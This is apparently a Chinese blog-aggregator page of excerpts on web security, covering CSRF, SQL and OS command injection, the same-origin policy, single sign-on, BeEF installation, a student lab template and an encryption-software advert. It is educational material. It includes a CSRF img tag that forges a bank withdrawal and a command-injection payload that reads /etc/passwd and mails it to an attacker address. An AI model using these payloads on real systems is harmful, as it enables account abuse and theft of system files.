网络安全

什么是CSRF攻击?如何避免?

牧云@^-^@ 提交于 2019-12-05 16:28:52
跨站请求伪造 (英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding ,通常缩写为 CSRF 或者 XSRF , 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。跟 跨网站脚本 (XSS)相比, XSS 利用的是用户对指定网站的信任,CSRF 利用的是网站对用户网页浏览器的信任。 攻击细节 跨站请求攻击,简单地说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并运行一些操作(如发邮件,发消息,甚至财产操作如转账和购买商品)。由于浏览器曾经认证过,所以被访问的网站会认为是真正的用户操作而去运行。这利用了web中用户身份验证的一个漏洞: 简单的身份验证只能保证请求发自某个用户的浏览器,却不能保证请求本身是用户自愿发出的 。 例子 假如一家银行用以运行转账操作的URL地址如下:http://www.examplebank.com/withdraw?account=AccoutName&amount=1000&for=PayeeName 那么,一个恶意攻击者可以在另一个网站上放置如下代码: <img src="http://www.examplebank.com/withdraw?account=Alice&amount=1000&for=Badman">

针对Web的攻击技术

孤街醉人 提交于 2019-12-05 15:08:56
主动攻击 SQL注入攻击 OS命令注入攻击 会话劫持 被动攻击 XSS攻击 CSRF攻击 HTTP首部注入攻击 会话固定攻击 一、主动攻击 1.SQL注入攻击 什么是SQL? SQL是用来操作关系型数据库管理系统的数据库语言,可进行操作数据或定义数据等。 什么是SQL注入? SQL注入是指针对Web应用使用的数据库,通过运行非法的SQL而产生的攻击。如果在调用SQL语句的方式上存在疏漏,就有可能执行被恶意注入非法SQL语句。 SQL案例: SELECT * FROM bookTb1 WHERE author = '作者'--' and flag = 1 SQL语句中的--之后全部视为注释,即and flag = 1就会被忽略。 2.OS命令注入攻击 什么是OS命令注入攻击? OS命令注入攻击是指通过Web应用,执行非法的操作系统命令达到攻击的目的。 如何攻击? 可以从Web应用中通过Shell来调用操作系统命令。如果调用的Shell时存在疏漏,就可以执行插入的非法OS命令。通过OS注入攻击可执行OS上安装的各种程序。 示例: |/usr /sbin /sendmail ; cat /etc / passwd | mail hack@example.jp 攻击者输入值(; cat /etc / passwd | mail hack@example.jp)中含有分号(;)

实验一 网络侦查与网络扫描

六眼飞鱼酱① 提交于 2019-12-05 14:33:51
学 号20172144008 中国人民公安大学 Chinese people’ public security university 网络对抗技术 实验报告 实验一 网络侦查与网络扫描 学生姓名 田东坤 年级 201721440008 区队 17网安四区队 指导教师 高见 信息技术与网络安全学院 2017 年 7 月 7 日 实验任务总纲 2017—2018 学年 第 一 学期 一、实验目的 1.加深并消化本课程授课内容,复习所学过的互联网搜索技巧、方法和技术; 2.了解并熟悉常用搜索引擎、扫描工具、社交网站等互联网资源,对给定的任务进行搜索、关联、分析; 3.达到巩固课程知识和实际应用的目的。 二、实验要求 1.认真阅读每个实验内容,需要截图的题目,需清晰截图并对截图进行标注和说明。 2.文档要求结构清晰,图文表达准确,标注规范。推理内容客观、合理、逻辑性强。 3.软件工具可使用office2003或2007、Nmap、等。 4.实验结束后,保留电子文档。 三、实验步骤 1.准备 提前做好实验准备,实验前应把详细了解实验目的、实验要求和实验内容,熟悉并准备好实验用的软件工具,按照实验内容和要求提前做好实验内容的准备。 2.实验环境 描述实验所使用的硬件和软件环境(包括各种软件工具); 开机并启动软件office2003或2007、浏览器、扫描软件。 3.实验过程 1

企业电脑如何实现加密管理?广州企业加密软件服务商,深圳风奥科技

自闭症网瘾萝莉.ら 提交于 2019-12-05 14:32:08
处于 21 世纪的互联网企事业单位,面临网络数据安全危机问题该如何应对? “ 企业安全 ” 、 “ 信息安全 ”…… 等等各类的安全问题成为互联网企事业单位无论是上市企业还是中小企业管理人员所关注热点重点话题,企事业单位努力寻找企业信息化管理中关于企业安全管理的建设方案,何种的信息安全,企业数据防泄漏方案是企事业单位所需要的?接下来我们就具体探讨一下企事业单位如何应对如今的互联网数据安全问题?如何有效的保证企事业单位数据文件的使用安全? 电脑文件加密软件 服务商,一个好的服务商,不仅仅要看其产品,同时也要关注其售后服务以及技术支持等等相关性的技术服务!公司电脑文件如何进行加密更安全?电脑文件加密,目前市面上使用比较广的,且适合企事业单位使用的加密技术 -- 驱动层透明加密技术,这是伴随着时代的发展不断完善的加密软件技术,由于信息化的发展,传统的加密手段无法满足现今企业对于安全的需求,因此现代化的加密技术逐步发展企业,驱动层加密技术,成为企事业单位选择加密软件的首选加密技术! 风奥金甲企业加密软件,采用的是驱动层透明加密技术,在电脑底层对数据文件进行加密,加密后的文件可以设置,在指定部门内可以流通使用,或者在指定的局域网环境内可以流通使用,对于那些有意无意拷贝外发文件出去的,可以做到很好的限制,经过金甲加密软件加密的文件,只要是未获得授权允许的,将加密文件外发出去,都是呈现加密状态

抓包

不想你离开。 提交于 2019-12-05 14:09:04
抓包是拦截查看网络数据包内容的软件,通过对抓获的数据包进行分析,可以得到有用的信息。抓包通过对网络上传输的数据进行抓取,可以对其进行分析,对于软件的Debug很大的帮助。也可以通过抓取用户发送的涉及用户名和密码的数据包来获取用户的密码。 抓包工具更多的用于网络安全,比如查找感染病毒的计算机。有时也用于获取网页的源代码,以及了解攻击者所用方法、追查攻击者的ip地址等。 来源: https://www.cnblogs.com/wdn135468/p/11926779.html

【转】单点登录的三种实现方式

孤街醉人 提交于 2019-12-05 13:49:20
单点登录SSO(Single Sign On)说得简单点就是在一个多系统共存的环境下,用户在一处登录后,就不用在其他系统中登录,也就是用户的一次登录能得到其他所有系统的信任。单点登录在大型网站里使用得非常频繁,例如像阿里巴巴这样的网站,在网站的背后是成百上千的子系统,用户一次操作或交易可能涉及到几十个子系统的协作,如果每个子系统都需要用户认证,不仅用户会疯掉,各子系统也会为这种重复认证授权的逻辑搞疯掉。实现单点登录说到底就是要解决如何产生和存储那个信任,再就是其他系统如何验证这个信任的有效性,因此要点也就以下两个: 存储信任 验证信任 如果一个系统做到了开头所讲的效果,也就算单点登录,单点登录有不同的实现方式,本文就罗列我开发中所遇见过的实现方式。 以Cookie作为凭证媒介 最简单的单点登录实现方式,是使用cookie作为媒介,存放用户凭证。 用户登录父应用之后,应用返回一个加密的cookie,当用户访问子应用的时候,携带上这个cookie,授权应用解密cookie并进行校验,校验通过则登录当前用户。 Auth via cookie 不难发现以上方式把信任存储在客户端的Cookie中,这种方式很容易令人质疑: Cookie不安全 不能跨域实现免登 对于第一个问题,通过加密Cookie可以保证安全性,当然这是在源代码不泄露的前提下。如果Cookie的加密算法泄露

实验一

陌路散爱 提交于 2019-12-05 12:10:40
学 号 中国人民公安大学 Chinese people’ public security university 网络对抗技术 实验报告 实验一 网络侦查与网络扫描 学生姓名 杜宇宸 年级 2017 区队 网安五区 指导教师 高见 信息技术与网络安全学院 2017 年 7 月 7 日 实验任务总纲 2017—2018 学年 第 一 学期 一、实验目的 1 .加深并消化本课程授课内容,复习所学过的互联网搜索技巧、方法和技术; 2 .了解并熟悉常用搜索引擎、扫描工具、社交网站等互联网资源,对给定的任务进行搜索、关联、分析; 3 .达到巩固课程知识和实际应用的目的。 二、实验要求 1 .认真阅读每个实验内容,需要截图的题目,需清晰截图并对截图进行标注和说明。 2 .文档要求结构清晰,图文表达准确,标注规范。推理内容客观、合理、逻辑性强。 3 .软件工具可使用 office2003 或 2007 、 Nmap 、等。 4 .实验结束后,保留电子文档。 三、实验步骤 1 .准备 提前做好实验准备,实验前应把详细了解实验目的、实验要求和实验内容,熟悉并准备好实验用的软件工具,按照实验内容和要求提前做好实验内容的准备。 2 .实验环境 描述实验所使用的硬件和软件环境(包括各种软件工具); 开机并启动软件 office2003 或 2007 、浏览器、扫描软件。 3 .实验过程 1

浅谈前端安全

浪尽此生 提交于 2019-12-05 11:20:28
安全问题的分类 按照所发生的区域分类 后端安全问题:所有发生在后端服务器、应用、服务当中的安全问题 前端安全问题:所有发生在浏览器、单页面应用、Web页面当中的安全问题 按照团队中哪个角色最适合来修复安全问题分类 后端安全问题:针对这个安全问题,后端最适合来修复 前端安全问题:针对这个安全问题,前端最适合来修复 综合以上 前端安全问题:发生在浏览器、前端应用当中或者通常由前端开发工程师来对其进行修复的安全问题 浏览器安全 同源策略 是一种约定,是浏览器最核心也最基本的安全功能,限制了来自不同源的document或者脚本,对当前document读取或设置某些属性 影响“源”的因素有:host(域名或者IP地址)、子域名、端口、协议 对浏览器来说,DOM、Cookie、XMLHttpRequest会受到同源策略的限制 不受同源策略的标签 <script>、<img>、<iframe>、<link> 等标签都可以跨域加载资源,而不受同源策略的限制 这些带"src"属性的标签每次加载时,浏览器会发起一次GET请求 通过src属性加载的资源,浏览器限制了javascript的权限,使其不能读、写返回的内容 三大前端安全问题 1、跨站脚本攻击(XSS) 定义 英文全称:Cross Site Script,XSS攻击,通常指黑客通过“HTML注入”篡改了网页,插入了恶意的脚本

乌班图安装beef

对着背影说爱祢 提交于 2019-12-05 11:11:44
https://gems.ruby-china.org/是国内的ruby镜像站点 十分霸道 记录下过程 其实并不难 curl -L https://get.rvm.io | bash -s stable --autolibs=enabled curl -L https://get.rvm.io | bash -s stable gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3 或者 curl -sSL https://rvm.io/mpapis.asc | gpg --import - 如果提示少了gpg 就执行提示的代码如上 logout #退出一下再进入或者 source ~/.rvm/scripts/rvm rvm autolibs enable rvm requirements "/usr/local/rvm/config/db" ruby-lang.org 替换成 ruby-china.org rvm autolibs readline #看一下git再选择装什么版本 2.1.0不适用新版本了 cd 进入文件夹 rvm --install 2.3.3 --with-readline-dir=$rvm_path/usr rvm --install

[思路笔记]WEB安全之漏洞挖掘

别来无恙 提交于 2019-12-05 10:08:10
记录自己在实际渗透测试以及漏洞挖掘中会用到的思路和方法。不断完善,尽量以系统的方式展现程序化式的漏洞挖掘。由于各种原因,不便公开。 通用策略 1.信息搜集 : 数据挖掘、业务挖掘 数据: 邮箱、手机号、真实姓名、邮箱、历史漏洞、网站程序CMS、子域名 历史漏洞Bypass,绕过 业务:新业务(公众号发布新产品)、新闻、公众号、朋友圈(内部员工、资料和消息)、QQ群(公司名等xxx) 2.模块化测试 3.漏洞/资产记录 网址 状态 CMS/框架 容器/中间件 blog.dyboy.cn 200 Emlog nginx 4.最新漏洞 漏洞预警、尝试POC编写 5.WebFuzz 逻辑越权漏洞 增、删 请求头 Request Header CORS跨域共享资源 origin 敏感信息泄漏 JSONP 劫持(回调参数+字典) GET 与 POST 参数交换 FastJSON 反序列化 JSON 格式请求参数 隐藏参数(调试功能/调试参数) 权限验证 CSRF 的 TOKEN 删除参数为空是否成功 POST 与 GET 类型参数的转换,可删除部分参数 点击劫持( Click jacking ) 漏洞组合利用 等待添加… 来源: https://www.cnblogs.com/M0rta1s/p/11920926.html